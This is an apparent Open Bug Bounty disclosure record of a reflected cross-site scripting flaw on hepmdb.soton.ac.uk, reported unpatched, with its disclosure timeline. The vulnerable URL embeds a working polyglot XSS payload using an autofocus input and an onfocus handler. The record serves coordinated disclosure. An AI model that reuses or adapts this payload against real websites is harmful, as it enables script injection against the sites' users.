Lucene search

K
openbugbountyEbOBB:260837
HistoryJul 06, 2017 - 6:55 p.m.

hepmdb.soton.ac.uk XSS vulnerability

2017-07-0618:55:00
eb
www.openbugbounty.org
7
Vulnerable URL:
https://hepmdb.soton.ac.uk/index.php?mod=/%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3C/Title/%3C/script/%3E%3CInput/Autofocus/*/Onfocus=confirm`XSSPOSED`%20//%3E%3CSvg%3E&act;=showmodel&id;=
Details:
Description Value
Patched: No
Latest check for patch: 29.09.2017
Vulnerability type: XSS
Vulnerability status: Publicly disclosed
Alexa Rank Unknown / Not calculated
VIP website status: No
Check hepmdb.soton.ac.uk SSL connection: (Grade: B)
Coordinated Disclosure Timeline:
Description Value
Vulnerability submitted via Open Bug Bounty 6 July, 2017 18:55 GMT
Vulnerability existence verified and confirmed 7 July, 2017 05:42 GMT
Generic security notifications sent to website owner 7 July, 2017 05:42 GMT
Vulnerability details disclosed by researcher 29 September, 2017 06:30 GMT